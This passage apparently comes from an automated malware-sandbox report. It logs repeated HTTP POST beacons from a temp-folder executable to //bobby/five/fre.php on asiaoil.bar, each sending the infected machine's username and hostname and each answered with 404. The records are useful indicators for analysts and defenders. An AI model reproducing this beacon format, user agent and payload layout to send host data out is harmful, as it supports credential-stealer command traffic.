                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:07.023216963 CET321OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:07.110586882 CET322INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:07 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mWD8oFcQTyd%2FKCuxdF4a9PY1C39C0%2FGNEfnX%2F9EktX8IXwXAk4CddsJG8chvleqV6%2Bl4Pe9X7pM9zS7OCYa1Qb%2B3%2FB%2BhM5NKwwPD%2BX%2FUskzFky%2FFOD%2Fvt045vN%2BQZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44569da6591e1-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        60192.168.2.2249225172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:08.596977949 CET417OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:08.613538980 CET418OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:08.680362940 CET418INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:08 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=glNfx46H3%2BbVLTKDrhap51MhlIRkcModymLBNBd7dZ%2Bl67BTPpZNpBIlfD8OgL00wxL3CdtX6qUD2pekmgxeoZGkVArQG2lmbN%2B57FmuOEvY0CiRqZc24nnj2bPcgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446eac805911f-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        61192.168.2.2249226172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:09.667687893 CET419OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:09.683943987 CET419OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:09.773921967 CET420INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:09 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YpuHPmOjZQu3BJ71RrU5rE6ZD4gK%2FiddjmVX1894nkleKqaO0ZuA%2FZ4t0Hhr%2FEBANQiy%2F1dOteI5pqxTSy6LKaSwgoWmbo0Tuise9gruTiTrmWfL3ef0CFnSmrOP6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446f1795e8fd4-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        62192.168.2.2249227172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:10.711121082 CET421OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:10.727674007 CET421OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:10.805613041 CET422INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:10 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=263d7oWUNYmuRg8qalPaQG1rkbIXer23yE4CCwJl%2BycPuClpFI6FPf1gIeOZyF3Nt4DWuR0XxZA%2FK2Gwfg9%2FRUCXAmdrBxYU%2F%2FgwYdWQXfhfADT4oSnWfcr7aGjXFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446f7fa7290a3-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        63192.168.2.2249228172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:11.750458956 CET423OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:11.767074108 CET423OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:11.894766092 CET424INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:11 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rZcJVrDpVn0Jvm1Vx3izcMxx2xxi%2BRY0gOKUM%2BjgWD%2BYJ2bGoZJPCLIhbsX3VLB%2FEbDTmlKbO8MOV5p8OY13hTQVrNs14q81gtqG%2BYeK%2B7ujkKePtZGTix4rgIZT4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446fe7f4690fe-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        64192.168.2.2249229172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:12.826739073 CET424OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:12.843465090 CET425OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:12.954328060 CET425INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:12 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hiz8VTs2nqW2CMp0oz2HdrtKIKW9o%2B7ImEcKl2VS1ifwy0ulNriRcW%2FuIGG1IoL3PiyPTyaWq%2BPUB82nqy1x%2F7uZPeiH7cbbBHoH7NU9xoGBLymRw5hquZwyAOhtcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44705396d911e-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        65192.168.2.2249230172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:13.916424990 CET426OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:13.934345961 CET427OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:14.009248972 CET427INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:13 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=meN57bW15OrovAiOaftPdPV%2BVu9aNc%2FmGkhf3DxgM8J7CqQPL97QEdbuifiRTAjK93npEn2xIesb%2FN5MC7%2B7xpKWknwpItKd6NXh4KBXOeDXxIfIsEdpLWRlGlrQsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4470c0b639142-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        66192.168.2.2249231104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:14.928308964 CET428OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:14.944510937 CET428OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:15.005187035 CET429INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:14 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MLXoax8jkqv8eBPwf%2B%2FHkLStnp33pID1OGlxzxpw8mT%2BDJtVm%2Fko7dCOHPmAgnMB01wvsNPWgM%2BACIJ3McTTt4l4slPJE0ia9l6oA1b3jZBpZmUytzUvT6%2BsM8O8%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db447125bf8911f-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        67192.168.2.2249232172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:16.169338942 CET430OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:16.185606003 CET430OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:16.265043974 CET431INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:16 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3gZJQzAkWL%2Fu0oyFSXQkAE19rOUvT86ounx%2F2nUfTZE5zhEaRM6VwUQCQNWwfitnmL12%2B1q8KR5pPRKomKLsKvLs0yZmFdrB49ckYXWQAh8%2FP4%2FjzcT6%2BgWMfOI%2Bcg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4471a19969048-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        68192.168.2.2249234104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:17.425743103 CET432OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:17.442059040 CET432OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:17.529016018 CET433INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:17 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CVWgNT%2F3L1%2BppaTVgVDCxoKwuyVyVDAH6zVKoRJylnyRNyfDC2xX0Vm24lOeOSechfzcA1vgmVZNQs67XBF8JYV4Q8GGFRHDfBe2OCBaYxj7dDGPN3FxV3Y9%2Fs9AEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44721ffb76983-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        69192.168.2.2249235104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:18.783854008 CET433OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:18.800137043 CET434OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:18.911052942 CET434INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:18 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JkW3Yfq8929bkmz%2BZxma5WCDFCwlkkeMrZVjES5%2BGp19oTJDA%2FvVeGYB6q0J4yXwf6O8Ujd%2Bm4xURLIdmdWv80xluGmLKk%2BK5CnuxjOzH0TaS2jR2NsT%2BwpcvVu%2BPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4472a7d7c9193-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        7192.168.2.2249172104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:08.131839037 CET323OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:08.148073912 CET323OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:08.291701078 CET324INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:08 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GAzVwCo6pQjEmafddnL4QX9z1sDFHB2J%2FYbOLf50is46eNnXoOwYOokrFvyBn6ciX3XJ3aLhnc3SW1RSny%2BWp7rsb%2FchkjZeaoltFUzmAOwl3IbNQWt4WAouWFDm8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44570da0591ea-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        70192.168.2.2249236172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:19.840840101 CET435OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:19.857125044 CET435OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:19.945090055 CET436INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:19 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jX4p5OL3M4bhKeaGYr6eMZP4ecEb%2BRQKJFJMvHycGUM%2BR1sW8i66slzCERtcv76o3GVZu2AT%2BBb9%2BnWVHSGrEHQ65OlnuuLV3NX69%2BnX0CllH9Ufi1dPL3kXbE9UsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db447310d2a918f-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        71192.168.2.2249237172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:20.970686913 CET437OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:20.987104893 CET437OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:21.069719076 CET438INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:21 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wCsqQDtUNyAdb8N7QE5gpRV6yQp9OM5kLzcDr7AlwMrEbZXvVwvalAee7gk3yYD6lCHsuYIHi9jPPTnfADT3Vv66t86Ej5Rk3p%2BU8OrA6dwgCuh8u7DexDMJSkMrXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db447381a755be1-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        72192.168.2.2249238172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:22.072757959 CET439OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:22.089340925 CET439OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:22.165954113 CET440INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:22 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SRqidrs3tVmZaXWczrmKsgbZ4wzW0DNHNg57GTGmubIkUghb%2BRZ87SXRzbz4C2tAAPiS7VjMUqurezvKjUarwJZfb4vQq5PhgZ3zf0wd8HEEhwN0s6BL9vHZrcRCQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4473f0b3b9208-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        73192.168.2.2249239172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:23.139723063 CET441OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
